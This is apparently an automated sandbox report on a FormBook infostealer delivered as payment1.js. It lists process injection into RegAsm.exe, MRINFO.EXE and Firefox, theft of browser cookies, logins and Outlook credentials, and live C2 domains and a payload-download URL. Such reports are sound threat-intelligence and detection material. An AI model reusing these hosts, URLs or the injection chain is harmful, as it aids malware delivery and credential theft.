                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeSection loaded: NULL target: C:\Windows\SysWOW64\MRINFO.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: NULL target: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: NULL target: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\MRINFO.EXEThread register set: target process: 3568Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\MRINFO.EXEThread APC queued: target process: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BDF008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeProcess created: C:\Windows\SysWOW64\MRINFO.EXE "C:\Windows\SysWOW64\MRINFO.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\MRINFO.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\MRINFO.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information52
                Scripting                		Valid Accounts1
                Exploitation for Client Execution                		52
                Scripting                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory113
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)712
                Process Injection                		1
                Abuse Elevation Control Mechanism                		Security Account Manager121
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook5
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt712
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617730 Sample: payment1.js Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 47 www.weilaishijie.xyz 2->47 49 www.physicsbrain.xyz 2->49 51 4 other IPs or domains 2->51 75 Suricata IDS alerts for network traffic 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus detection for URL or domain 2->79 83 8 other signatures 2->83 12 wscript.exe 1 16 2->12         started        signatures3 81 Performs DNS queries to domains with low reputation 49->81 process4 dnsIp5 59 196.251.92.64, 49731, 80 Web4AfricaZA Seychelles 12->59 45 C:\Temp\dddddd.ps1, ASCII 12->45 dropped 97 System process connects to network (likely due to code injection or exploit) 12->97 99 JScript performs obfuscated calls to suspicious functions 12->99 101 Wscript starts Powershell (via cmd or directly) 12->101 103 2 other signatures 12->103 17 powershell.exe 13 12->17         started        file6 signatures7 process8 file9 43 C:\Users\user\AppData\Local\Temp\x.exe, PE32 17->43 dropped 61 Suspicious execution chain found 17->61 63 Found suspicious powershell code related to unpacking or dynamic code loading 17->63 65 Powershell drops PE file 17->65 21 x.exe 3 17->21         started        24 conhost.exe 17->24         started        signatures10 process11 signatures12 85 Antivirus detection for dropped file 21->85 87 Writes to foreign memory regions 21->87 89 Allocates memory in foreign processes 21->89 91 Injects a PE file into a foreign processes 21->91 26 RegAsm.exe 21->26         started        29 RegAsm.exe 21->29         started        process13 signatures14 95 Maps a DLL or memory area into another process 26->95 31 sxkv2RIDKUVCF4X010eCnC.exe 26->31 injected process15 signatures16 105 Maps a DLL or memory area into another process 31->105 107 Found direct / indirect Syscall (likely to bypass EDR) 31->107 34 MRINFO.EXE 13 31->34         started        process17 signatures18 67 Tries to steal Mail credentials (via file / registry access) 34->67 69 Tries to harvest and steal browser information (history, passwords, etc) 34->69 71 Modifies the context of a thread in another process (thread injection) 34->71 73 3 other signatures 34->73 37 sxkv2RIDKUVCF4X010eCnC.exe 34->37 injected 41 firefox.exe 34->41         started        process19 dnsIp20 53 www.dqvcbn.info 47.83.1.90, 52664, 52665, 52666 VODANETInternationalIP-BackboneofVodafoneDE United States 37->53 55 www.infiniteve.xyz 162.0.231.203, 52656, 52657, 52658 NAMECHEAP-NETUS Canada 37->55 57 3 other IPs or domains 37->57 93 Found direct / indirect Syscall (likely to bypass EDR) 37->93 signatures21

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                payment1.js16%VirustotalBrowse
                payment1.js11%ReversingLabsScript-JS.Dropper.Heuristic

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.weilaishijie.xyz/mvfs/100%Avira URL Cloudmalware
                http://www.weilaishijie.xyz/mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo=100%Avira URL Cloudmalware
                http://www.infiniteve.xyz/rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu100%Avira URL Cloudmalware
                http://www.travel-cure.sbs/0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbu0%Avira URL Cloudsafe
                http://www.lucynoel6465.shop/9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu100%Avira URL Cloudphishing
                http://www.dqvcbn.info/xqy6/100%Avira URL Cloudmalware
                http://www.dqvcbn.info100%Avira URL Cloudmalware
                http://196.251.92.64/crypt/popo.ps1100%Avira URL Cloudmalware
                http://www.physicsbrain.xyz/ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu100%Avira URL Cloudmalware
                http://www.physicsbrain.xyz/ajxq/100%Avira URL Cloudmalware
                http://196.251.92.64/crypt/popo.ps1m?0%Avira URL Cloudsafe
                http://www.dqvcbn.info/xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu100%Avira URL Cloudmalware
                http://www.infiniteve.xyz/rvdc/100%Avira URL Cloudmalware
                http://www.travel-cure.sbs/0c5p/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.weilaishijie.xyz
                		13.248.169.48
                		truefalse
                  		high
                  www.dqvcbn.info
                  		47.83.1.90
                  		truefalse
                    		high
                    www.travel-cure.sbs
                    		199.59.243.160
                    		truefalse
                      		high
                      www.physicsbrain.xyz
                      		13.248.169.48
                      		truefalse
                        		high
                        www.lucynoel6465.shop
                        		104.21.16.1
                        		truefalse
                          		high
                          www.infiniteve.xyz
                          		162.0.231.203
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.weilaishijie.xyz/mvfs/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.lucynoel6465.shop/9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbutrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.travel-cure.sbs/0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbutrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.weilaishijie.xyz/mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo=true
                            • Avira URL Cloud: malware
                            		unknown
                            http://196.251.92.64/crypt/popo.ps1true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.dqvcbn.info/xqy6/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.infiniteve.xyz/rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbutrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.physicsbrain.xyz/ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbutrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.physicsbrain.xyz/ajxq/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.dqvcbn.info/xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbutrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.infiniteve.xyz/rvdc/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.travel-cure.sbs/0c5p/true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://duckduckgo.com/chrome_newtabMRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.dqvcbn.infosxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2992102247.00000000051A8000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.ecosia.org/newtab/MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ac.ecosia.org/autocomplete?q=MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.comMRINFO.EXE, 0000000A.00000002.2990861843.00000000042F6000.00000004.10000000.00040000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2992872250.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2990429324.0000000003296000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://196.251.92.64/crypt/popo.ps1m?wscript.exe, 00000000.00000002.1935377292.00000174E9C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://contoso.com/powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://oneget.orgXpowershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://oneget.orgpowershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.16.1
                                                                        		www.lucynoel6465.shopUnited States
                                                                        		13335CLOUDFLARENETUSfalse
                                                                        13.248.169.48
                                                                        		www.weilaishijie.xyzUnited States
                                                                        		16509AMAZON-02USfalse
                                                                        199.59.243.160
                                                                        		www.travel-cure.sbsUnited States
                                                                        		395082BODIS-NJUSfalse
                                                                        162.0.231.203
                                                                        		www.infiniteve.xyzCanada
                                                                        		22612NAMECHEAP-NETUSfalse
                                                                        47.83.1.90
                                                                        		www.dqvcbn.infoUnited States
                                                                        		3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                                        196.251.92.64
                                                                        		unknownSeychelles
                                                                        		327813Web4AfricaZAtrue

                                                                        General Information

                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1617730
                                                                        Start date and time:2025-02-18 08:13:17 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 43s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
